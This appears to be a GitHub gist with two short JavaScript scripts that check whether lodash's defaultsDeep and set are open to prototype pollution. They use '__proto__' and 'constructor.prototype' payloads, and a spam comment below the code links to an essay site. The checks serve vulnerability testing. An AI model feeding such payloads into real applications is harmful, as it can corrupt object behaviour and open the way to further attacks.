Last active
June 27, 2023 15:32
-
-
Save Kirill89/5b20f80a57dddf0fc660434fa0aa6a28 to your computer and use it in GitHub Desktop.
prototype pollution check
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // https://github.com/Kirill89/prototype-pollution-explained | |
| const mergeFn = require('lodash').defaultsDeep; | |
| const payloads = [ | |
| '{"constructor": {"prototype": {"a0": true}}}', | |
| '{"__proto__": {"a1": true}}', | |
| ]; | |
| function check() { | |
| for (const p of payloads) { | |
| mergeFn({}, JSON.parse(p), {}); | |
| mergeFn({}, JSON.parse(p)); | |
| mergeFn(JSON.parse(p), {}); | |
| } | |
| for (let i = 0; i < payloads.length; i++) { | |
| if (({})[`a${i}`] === true) { | |
| console.log(`Yes with ${payloads[i]}`); | |
| } | |
| } | |
| } | |
| check(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // https://github.com/Kirill89/prototype-pollution-explained | |
| const setFn = require('lodash').set; | |
| const paths = [ | |
| 'constructor.prototype.a0', | |
| '__proto__.a1', | |
| ]; | |
| function check() { | |
| for (const p of paths) { | |
| setFn({}, p, true); | |
| } | |
| for (let i = 0; i < paths.length; i++) { | |
| if (({})[`a${i}`] === true) { | |
| console.log(`Yes with ${paths[i]}`); | |
| } | |
| } | |
| } | |
| check(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
It's great that you've been developing pollution code too! I understand that this can be a difficult task, but despite the problems, you continued to work on it. I got so carried away that I even found ocean pollution essay examples and topics ideas, used https://studymoose.com/free-essays/ocean-pollution for that. It is this kind of effort and perseverance that helps us find innovative solutions to protect the environment. Keep it up!